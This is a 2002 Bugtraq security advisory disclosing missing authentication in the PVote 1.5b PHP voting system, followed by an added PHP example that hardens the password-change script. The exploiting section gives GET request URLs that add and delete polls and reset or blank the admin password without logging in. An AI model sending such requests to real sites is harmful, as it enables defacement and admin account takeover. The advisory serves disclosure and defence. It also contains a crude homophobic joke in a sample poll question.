[[ TH 026 Inc. ]] SA #1 - Multiple vulnerabilities in PVote 1.5
daemon@ATHENA.MIT.EDU (Daniel Nyström)
Thu Apr 18 12:35:18 2002
Message-ID: <006201c1e674$ca0dee70$0b00a8c0@Natasha>
From: Daniel Nyström <exce@netwinder.nu>
To: <bugtraq@securityfocus.com>
Date: Thu, 18 Apr 2002 03:03:02 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Telhack Security Advisory - #1
_________________________________________
Name: PVote 1.5b
Impact: Minor (Content manipulation, Script admin)
Date: April 18 / 2002
_________________________________________
Daniel Nyström <exce@netwinder.nu>
_I N F O_
PVote is a PHP voting system. It uses MySQL to hold all information about
the system.
Author has been notified of all three problems described in this advisory.
_P R O B L E M_
A lot of the scripts in the PVote package do not properly check who the
user is and therefore let anyone add or delete polls at any time. Also, there
exists a vulnerability that lets anyone change the Admin password or set it to
null.
_I M P A C T_
Minor, as content manipulation ain't too bad after all. Just a little bit
embarrassing.
_E X P L O I T I N G_
These 'Add/Del' and 'Admin change pass' vulns can all be exploited from a
web browser by basic GET requests that might look something like these:
ADD
http://isp.net/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad
Question is the question :) o1-o4 are the options.
DEL
http://isp.net/pvote/del.php?pollorder=1
Pollorder is the poll 'id' number. It can be found by stepping through poll.php
to find the id as shown below:
http://isp.net/pvote/poll.php?pollorder=1
and then increasing pollorder (pollorder=2) and so on until you find what you
want.
CHANGE ADMIN PASS
http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned
Again we are allowed to change stuff without having to authenticate in
any way.
If we just wanna fuck with the admin we may just enter this:
http://isp.net/pvote/ch_info.php
As it sets both newpass and confirm to "" it sets the pass to "". This
could have been avoided by just adding a line of code that required you to
submit the old pass to be able to change it.
_F I X E S_
Many of the scripts in this package need some kind of secure
authentication method that stops users from behaving badly >:) and I think it
is up to the author(s?) to fix that.
But until then, I would recommend removing the package.
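Here is an added example (not PVote's own code, which I have not reproduced) of what the "line of code that requires the old pass" and the missing "who is the user" check could look like for the password-change script, and the same first gate is what add.php and del.php lack. The table name `admin`, its columns `id` and `passhash`, the `$db` PDO handle, the `$_SESSION['admin_id']` / `$_SESSION['csrf']` keys and the form field names are all assumptions made for this example:

```php
<?php
// Added example, not PVote's own code: a hardened replacement for the logic
// behind ch_info.php. Assumed (hypothetical) schema: table `admin` with
// columns `id` and `passhash`; the login code is assumed to set
// $_SESSION['admin_id'] and $_SESSION['csrf'] on a successful login.

session_start();

/**
 * Returns ['ok' => true] on success, or ['ok' => false, 'error' => '...'].
 * $method is $_SERVER['REQUEST_METHOD'], $session is $_SESSION, $post is $_POST.
 */
function change_admin_password(PDO $db, string $method, array $session, array $post): array
{
    // Gate 1: the script must know who the user is. The original script has
    // no such check, so anyone who can reach the URL can run it.
    if (empty($session['admin_id'])) {
        return ['ok' => false, 'error' => 'not logged in'];
    }

    // Gate 2: a password change is a state change, so accept POST only.
    // A plain GET link with query parameters can then no longer trigger it.
    if ($method !== 'POST') {
        return ['ok' => false, 'error' => 'POST required'];
    }

    // Gate 3: the form carries a per-session token (assumed to be issued
    // when the form is rendered), compared in constant time.
    if (empty($post['token']) || empty($session['csrf'])
        || !hash_equals($session['csrf'], (string)$post['token'])) {
        return ['ok' => false, 'error' => 'bad form token'];
    }

    $old     = (string)($post['oldpass'] ?? '');
    $new     = (string)($post['newpass'] ?? '');
    $confirm = (string)($post['confirm'] ?? '');

    // Gate 4: refuse empty or too-short passwords. Calling the script with
    // no parameters must NOT silently set the password to "".
    if (strlen($new) < 8) {
        return ['ok' => false, 'error' => 'new password too short'];
    }
    if (!hash_equals($new, $confirm)) {
        return ['ok' => false, 'error' => 'passwords do not match'];
    }

    // Gate 5: require the current password before accepting a new one.
    $stmt = $db->prepare('SELECT passhash FROM admin WHERE id = ?');
    $stmt->execute([$session['admin_id']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($old, (string)$row['passhash'])) {
        return ['ok' => false, 'error' => 'old password incorrect'];
    }

    // Store only a salted hash of the new password, never the plaintext.
    $stmt = $db->prepare('UPDATE admin SET passhash = ? WHERE id = ?');
    $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $session['admin_id']]);
    return ['ok' => true];
}

// Usage inside ch_info.php, assuming $db is an already-opened PDO connection:
// $result = change_admin_password($db, $_SERVER['REQUEST_METHOD'], $_SESSION, $_POST);
```

Gate 1 on its own is the fix the add/del scripts need; gates 4 and 5 are what turn the "empty request sets an empty password" case into a rejected request instead of a silent lockout.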
/Daniel Nyström a.k.a excE @ Telhack 026 Inc.
http://excelsi0r.darktech.org/~exce/
http://www.telhack.com <- page temporarily down.